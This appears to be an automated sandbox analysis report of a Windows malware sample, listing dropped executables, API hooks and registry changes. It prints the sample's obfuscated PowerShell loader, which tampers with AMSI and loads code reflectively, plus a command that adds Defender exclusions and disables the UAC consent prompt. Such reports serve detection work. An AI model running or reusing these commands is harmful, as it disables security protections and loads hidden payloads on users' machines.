Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll

Source: C:\Windows\System32\notepad.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 0000001D.00000002.2426865133.00000217A445D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.1425764718.00000217A445D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000001D.00000000.1425603947.00000217A442B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2424589192.00000217A442B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbl source: svchost.exe, 0000001D.00000000.1425603947.00000217A442B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2424589192.00000217A442B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000001D.00000000.1425700551.00000217A4440000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2426078194.00000217A4440000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001D.00000000.1425700551.00000217A4440000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2426078194.00000217A4440000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001D.00000000.1425603947.00000217A442B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2424589192.00000217A442B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000001D.00000000.1425603947.00000217A442B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2424589192.00000217A442B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct49A7.tmp.pdb source: svchost.exe, 0000001D.00000000.1425700551.00000217A4440000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2426078194.00000217A4440000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: BE0A5831\ntkrnlmp.pdbr source: svchost.exe, 0000001D.00000000.1425700551.00000217A4440000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2426078194.00000217A4440000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001D.00000000.1425603947.00000217A442B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2424589192.00000217A442B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000001D.00000000.1425700551.00000217A4440000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2426078194.00000217A4440000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000001D.00000000.1425700551.00000217A4440000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2426078194.00000217A4440000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000001D.00000000.1425700551.00000217A4440000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2426078194.00000217A4440000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000001D.00000002.2426865133.00000217A445D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.1425764718.00000217A445D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001D.00000000.1425603947.00000217A442B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2424589192.00000217A442B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000001D.00000002.2426865133.00000217A445D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.1425764718.00000217A445D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000001D.00000002.2426865133.00000217A445D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.1425764718.00000217A445D000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: SVrB5SO0.exe.3.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: SVrB5SO0.exe.3.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: SVrB5SO0.exe.3.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: SVrB5SO0.exe.3.dr, Helper.cs	.Net Code: XMemory System.AppDomain.Load(byte[])
Source: SVrB5SO0.exe.3.dr, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: SVrB5SO0.exe.3.dr, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: SVrB5SO0.exe.3.dr, Messages.cs	.Net Code: Memory

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer($DFTpDBThbtAKah,$XnKYApPjMWcAPTVilEP).Invoke(''+'a'+'m'+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$ZzcKBPlSMhzEIWMhJ=$InAbAdJDZoir
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+'l'+'e'+''+[Char](99)+'t'+'e'+''+'d'+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+'TW'+'A'+''+[Char](82)+'E').GetValue(''+[Char](115)+'v'+[Char](115)+''+'t'+'a'+[Char](103)+'e'+'r'+'')).EntryP

Obfuscated command line found

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KHaJDxumDNco{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IrkchjYcpcIHrG,[Parameter(Position=1)][Type]$FKynkUloVt)$wzaPjwDXVrR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+'l'+'e'+''+[Char](99)+'t'+'e'+''+'d'+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e','Cl'+[Char](97)+'ss'+','+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'ea'+[Char](108)+''+[Char](101)+''+'d'+','+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+'l'+[Char](97)+''+'s'+''+'s'+','+[Char](65)+''+'u'+'t'+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$wzaPjwDXVrR.DefineConstructor('R'+'T'+''+'S'+''+[Char](112)+''+[Char](101)+'c'+'i'+'a'+'l'+''+[Char](78)+'a'+[Char](109)+'e'+','+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+'g'+','+'P'+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$IrkchjYcpcIHrG).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+[Char](97)+''+[Char](103)+''+'e'+'d');$wzaPjwDXVrR.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+'o'+'k'+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+''+[Char](44)+''+'V'+'i'+'r'+''+'t'+'u'+[Char](97)+''+'l'+'',$FKynkUloVt,$IrkchjYcpcIHrG).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $wzaPjwDXVrR.CreateType();}$ZLkQxZedqjGHd=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+''+'t'+''+'e'+'m'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+'3'+''+'2'+''+'.'+''+'U'+'ns'+'a'+''+'f'+''+[Char](101)+''+[Char](78)+'ati'+[Char](118)+''+'e'+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+'d'+'s'+'');$InAbAdJDZoirzm=$ZL

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath $Env:ProgramData, $Env:Temp, $Env:HomeDrive; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0 -Type DWord
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KHaJDxumDNco{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IrkchjYcpcIHrG,[Parameter(Position=1)][Type]$FKynkUloVt)$wzaPjwDXVrR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+'l'+'e'+''+[Char](99)+'t'+'e'+''+'d'+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e','Cl'+[Char](97)+'ss'+','+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'ea'+[Char](108)+''+[Char](101)+''+'d'+','+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+'l'+[Char](97)+''+'s'+''+'s'+','+[Char](65)+''+'u'+'t'+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$wzaPjwDXVrR.DefineConstructor('R'+'T'+''+'S'+''+[Char](112)+''+[Char](101)+'c'+'i'+'a'+'l'+''+[Char](78)+'a'+[Char](109)+'e'+','+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+'g'+','+'P'+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$IrkchjYcpcIHrG).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+[Char](97)+''+[Char](103)+''+'e'+'d');$wzaPjwDXVrR.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+'o'+'k'+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+''+[Char](44)+''+'V'+'i'+'r'+''+'t'+'u'+[Char](97)+''+'l'+'',$FKynkUloVt,$IrkchjYcpcIHrG).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $wzaPjwDXVrR.CreateType();}$ZLkQxZedqjGHd=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+''+'t'+''+'e'+'m'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+'3'+''+'2'+''+'.'+''+'U'+'ns'+'a'+''+'f'+''+[Char](101)+''+[Char](78)+'ati'+[Char](118)+''+'e'+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+'d'+'s'+'');$InAbAdJDZoirzm=$ZL
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath $Env:ProgramData, $Env:Temp, $Env:HomeDrive; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0 -Type DWord	Jump to behavior

Source: C:\Windows\System32\notepad.exe	Code function: 2_3_000001CB53D3B0ED push rcx; retf 003Fh	2_3_000001CB53D3B0EE
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E85458 push rbx; retf	2_2_000001CB53E8545C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E85C50 push rbx; retf	2_2_000001CB53E85C5C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E86C50 push rbx; retf	2_2_000001CB53E86C5C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E86469 push rbx; retf	2_2_000001CB53E8647C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E85C60 push rbx; retf	2_2_000001CB53E85C6C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E86C60 push rbx; retf	2_2_000001CB53E86C6C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E85438 push rbx; retf	2_2_000001CB53E8543C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E85C30 push rbx; retf	2_2_000001CB53E85C3C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E86430 push rbx; retf	2_2_000001CB53E8643C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E86C30 push rbx; retf	2_2_000001CB53E86C3C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E85448 push rbx; retf	2_2_000001CB53E8544C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E85C40 push rbx; retf	2_2_000001CB53E85C4C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E86440 push rbx; retf	2_2_000001CB53E8644C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E86C40 push rbx; retf	2_2_000001CB53E86C4C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E85418 push rbx; retf	2_2_000001CB53E8541C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E85C10 push rbx; retf	2_2_000001CB53E85C1C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E86410 push rbx; retf	2_2_000001CB53E8641C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E86C10 push rbx; retf	2_2_000001CB53E86C1C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E85428 push rbx; retf	2_2_000001CB53E8542C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E85C20 push rbx; retf	2_2_000001CB53E85C2C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E86420 push rbx; retf	2_2_000001CB53E8642C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E86C20 push rbx; retf	2_2_000001CB53E86C2C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E86BF8 push rbx; retf	2_2_000001CB53E86BFC
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E853F0 push rbx; retf	2_2_000001CB53E853FC
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E85BF0 push rbx; retf	2_2_000001CB53E85BFC
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E85408 push rbx; retf	2_2_000001CB53E8540C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E85C00 push rbx; retf	2_2_000001CB53E85C0C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E86400 push rbx; retf	2_2_000001CB53E8640C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E86C00 push rbx; retf	2_2_000001CB53E86C0C
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E86BD8 push rbx; retf	2_2_000001CB53E86BDC

Source: C:\ProgramData\j3owB.exe	File created: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\SVrB5SO0.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\j3owB.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\cZp98.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\SVrB5SO0.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\j3owB.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\cZp98.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Hooks files or directories query functions (used to hide files and directories)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Modifies the prolog of user mode functions (user mode inline hooks)

Source: winlogon.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Source: C:\ProgramData\cZp98.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE svstager

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
